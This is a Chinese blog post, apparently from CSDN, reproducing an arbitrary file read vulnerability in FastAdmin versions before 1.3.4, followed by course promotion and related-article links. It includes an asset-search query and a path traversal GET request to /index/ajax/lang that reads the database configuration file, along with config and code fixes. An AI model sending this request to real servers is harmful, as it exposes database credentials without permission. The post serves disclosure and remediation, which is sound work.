FastAdmin任意文件读取漏洞

于 2025-07-22 10:00:00 发布
阅读量808 收藏 19
点赞数 22
CC 4.0 BY-SA版权
分类专栏: 网络安全 程序员 编程 文章标签: web安全 安全 android java 开发语言 eclipse tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1_3_9_7/article/details/149500461

一、漏洞描述

FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架,FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。astAdmin框架存在任意文件读取漏洞,攻击者利用此漏洞可以获取系统敏感信息。

二、影响版本

FastAdmin版本 < 1.3.4

三、资产测绘

app=“FASTADMIN-框架”

四、漏洞复现

GET /index/ajax/lang?lang=../../application/database HTTP/1.1``   ``Host:` `   ``Upgrade-Insecure-Requests: 1``   ``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36``   ``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``   ``Accept-Encoding: gzip, deflate``   ``Accept-Language: zh-CN,zh;q=0.9

五、快速修复方法

如果站点不使用多语言,可以通过修改application/config.php大概第45行的lang_switch_on的对应值修改为false即可。

六、手动修复方法

打开application/common/behavior/Common.php,添加以下代码

    public function appInit()  
    {  
        $allowLangList = Config::get('allow_lang_list') ?? ['zh-cn', 'en'];  
        \think\Lang::setAllowLangList($allowLangList);  
    }

如图:

然后打开application/tags.php,在app_init对应的数组中添加以下代码

'app\\common\\behavior\\Common',

如图:

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。

内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
在这里插入图片描述
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要见下图即可前往获取
在这里插入图片描述

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

FastAdmin后台开发框架 lang 任意文件读取漏洞复现
0xSec
06-17 4310
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
Fastadmin框架短视频知识付费系统存在任意文件读取漏洞
缘梦未来的博客
11-24 357
FastAdmin框架短视频系统/视频知识付费源码/附带小说系统系统视频支持包月、单独购买、观影卷等功能源码附带小说系统源码需要配置高服务器和VDN加速
网站安全检测:推荐8款免费的 Web 安全测试工具
weixin_34376986的博客
06-18 1214
  随着 Web 应用越来越广泛,Web 安全威胁日益凸显。黑客利用网站操作系统的漏洞Web 服务程序的 SQL 注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对 Web 应用安全的关注度也逐渐升温。下面向大家推荐8款非常有用的免费 Web 安全测试工具。 ...
Docker常用命令
专注于互联网架构技术,努力成为一名架构师
10-28 1万+
1. 查看docker信息(version、info) [plain] view plaincopy # 查看docker版本   $docker version      # 显示docker系统的信息   $docker info   2. 对image的操作(search、pull、images、rmi、history
python之装饰器
weixin_33767813的博客
02-05 200
一,什么是装饰器? 装饰器本质上就是一个python函数,他可以让其他函数在不需要做任何代码变动的前提下,增加额外的功能,装饰器的返回值也是一个函数对象。 装饰器的应用场景:比如插入日志,性能测试,事务处理,缓存等等场景。 二,装饰器的形成过程。 现在我有一个需求,我想让你测试这个函数的执行时间,在不改变这个函数代码的情况下: import time def func1()...
【奇淫技巧】mysql注入小技巧(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
A1_3_9_7的博客
03-17 934
举例:通过布尔盲注的方法注当前登录用户名的第一位(这里是"r",ascii编码后是114),通过截取user字段第一位与爆破位置的数字进行比较,如果爆破位置数字小于114,就会触发溢出数据库报错,如果>=114就会回显正常,所以这里可以判断当前登录用户名的第一位ascii编码后是114,是"r"。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2850
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
fastAdmin lang接口任意文件读取漏洞(内含XrayPoC)
WuYSec的博客
06-18 1860
fastAdmin是一款基于ThinkPHP和Bootstrap开发的开源后台管理框架,旨在帮助开发者快速构建高效、灵活的后台管理系统。fastAdmin存在任意文件读取漏洞,可直接读取数据库配置文件。
FastAdmin目录穿越 CVE-2024-7928
iSee857的博客
08-24 1288
Bootstrap开发的快速后台开发框架。FastAdmin基于Apache2.0开源协议发布,免费且不限制商业使用,目前被广泛应用于各大行业应用后台管理。其接口lang存在目录穿越漏洞,攻击者可通过该漏洞获取系统库敏感信息。该漏洞已支持yakit插件检测,根据uuid 39894f51-f782-48eb-bb01-d1e0421b8e9c 进行下载。升级至安全版本:1.3.4.20220530。FastAdmin是一款基于。
安全漏洞】挖洞小记
HBohan的博客
10-12 1551
前言:上个月月初开始,在那些项目结束之后进入了挖洞时期,每天的日常工作就是挖洞,除非有临时的项目才会停下,最近在整理报告,发现了这个站,还是挺有意思的。 信息收集 从fofa上找到了这个站点,叫做fastadmin,是基于Thinkphp5和bootstrap开发的后台框架,常规思路找一下后台,根据经验,没意外的话php的站点基本都是根路径后加个admin就可以找到了 getshell 常规手段弱口令先打一波,不行再试试SQL注入 弱口令admin/123456成功进入后台 因为结合了tp5框架,想到可.
Python之装饰器
weixin_34295316的博客
01-23 188
什么是装饰器? 在说装饰器之前啊. 我们先说一个软件设计的原则: 开闭原则, 又被成为开放封闭原则,你的代码对功能的扩展是开放的你的程序对修改源代码是封闭的. 这样的软件设计思路可以更好的维护和开发。   开放:对功能扩展开放   封闭:对修改代码封闭 谈装饰器前,还要先要明白一件事,Python 中的函数可以像普通变量一样当做参数传递给另外一个函数,例如: def foo(...
推荐8个炫酷的 Python 装饰器!
大江狗
07-21 707
Python 编程语言的一大优点是它把所有功能都打包到一个小包中,这些功能非常有用。许多特性可以完全改变 Python 代码的功能,这使得该语言更加灵活。如果使用得当,其中一些功能可以有效...
普通人成为黑客有多难?
小司机的奥拓
01-24 1931
零基础不知从何下手?想转行的求职者如何入门?想精深的从业者如何提升?:网络安全种类千千万,不知道自己适合哪一类!:没经验缺方法、面试通不过、应该从哪儿学起没头绪:野路子、没人教、没有完整的学习体系,始终得不到成长:想进入网络安全领域,没有合适路径,敲不开大门这都不是问题!重要的是你有这个毅力以及想学的心~不要自己把“黑客“臆想的很难,黑客也是人,他曾近也跟我们一样是个普通人!我不知道你是对黑客感兴趣,还是真的向往这个方向发展,先上学习路线!
python中的装饰器是干嘛的-python中的装饰器
weixin_37988176的博客
10-29 170
python的装饰器是用来装饰函数的。这是什么意思呢?假如我们有一个函数,这个函数的功能不能满足我们现有的需求,那么我们可以通过装饰器在这个函数执行前执行后做一些我们需要的操作(如果函数本身功能不满足,那就直接修改方法体了,不需要装饰器帮忙)。1. 简单装饰器装饰器的语法糖是使用@符号表示,装饰器本身也是一个函数,只不过参数是函数而已。def decor_function(func):def wr...
微信小程序渗透测试
weixin_41308444的博客
10-14 3887
微信小程序渗透测试
【渗透测试】深度解析微信小程序漏洞挖掘!黑客技术零基础入门到精通教程建议收藏!
白帽阿叁的博客
11-27 4015
今天讲讲微信小程序渗透,无论是护网、src挖掘、攻防演练,微信小程序都可以成为突破口微信小程序和普通网页渗透相比有以下不同点:1、抓包方式不同,不能直接进行抓包2、不能直接进行调试,如果遇到小程序进行了加密传输,这种情况就比较棘手3、微信小程序有自己特有的漏洞4、某些微信小程序会进行一些限制,增加了测试难度针对以上情况,我会分为四个章节逐一进行解答:抓包篇、逆向篇、漏洞篇、技巧篇微信小程序渗透本质和浏览器网页渗透没啥区别,解决了这些不同点就可以像正常网页一样测试了。
python装饰器详解
热门推荐
xiangxianghehe的博客
08-14 17万+
“你会Python嘛?” “我会!” ‘那你给我讲下Python装饰器吧!’ “Python装饰器啊?我没用过哎” 简言之,python装饰器就是用于拓展原来函数功能的一种函数,这个函数的特殊之处在于它的返回值也是一个函数,使用python装饰器的好处就是在不用更改原函数的代码前提下给函数增加新的功能。 一般而言,我们要想拓展原来函数代码,最直接的办法就是侵入代码里面修改,例如: ...
初学Python要了解什么 装饰器知识汇总有哪些
qq_43444478的博客
08-06 169
初学Python要了解什么?装饰器知识汇总有哪些?在Python学习过程中,有多种方法对函数和类进行加工,相对于其它方式,装饰器语法简单,代码可读性高。因此,装饰器在Python项目中有广泛的应用,比如插入日志、性能测试、事务处理等。很多Python初学者不了解装饰器的使用,下面就给大家汇总一下Python装饰器相关知识。 装饰器(decorator)是一种高级Python...
致远oa wpsassistservlet 任意文件读取漏洞
12-27
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。 这个漏洞存在的根本原因可能是在致远oa wpsassistservlet中对用户输入的数据没有进行充分的验证和过滤,导致攻击者可以构造恶意请求,获取系统文件的内容。一旦攻击者成功利用这个漏洞,就可能对系统进行攻击,损害系统的安全性。 针对致远oa wpsassistservlet 任意文件读取漏洞,我们可以采取一些措施来加强系统的安全性。首先,及时更新系统补丁,确保系统能够及时修复这个漏洞。其次,加强对用户输入数据的验证和过滤,限制用户的输入范围,避免攻击者利用恶意输入来进行攻击。另外,加强系统的监控和审计功能,及时发现异常行为,并进行处理。 总的来说,致远oa wpsassistservlet 任意文件读取漏洞是一种严重的安全隐患,需要引起相关部门的重视,采取必要的措施来确保系统的安全性。只有不断加强系统的安全防护措施,及时修复存在的漏洞,才能有效地提升系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安导师小李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值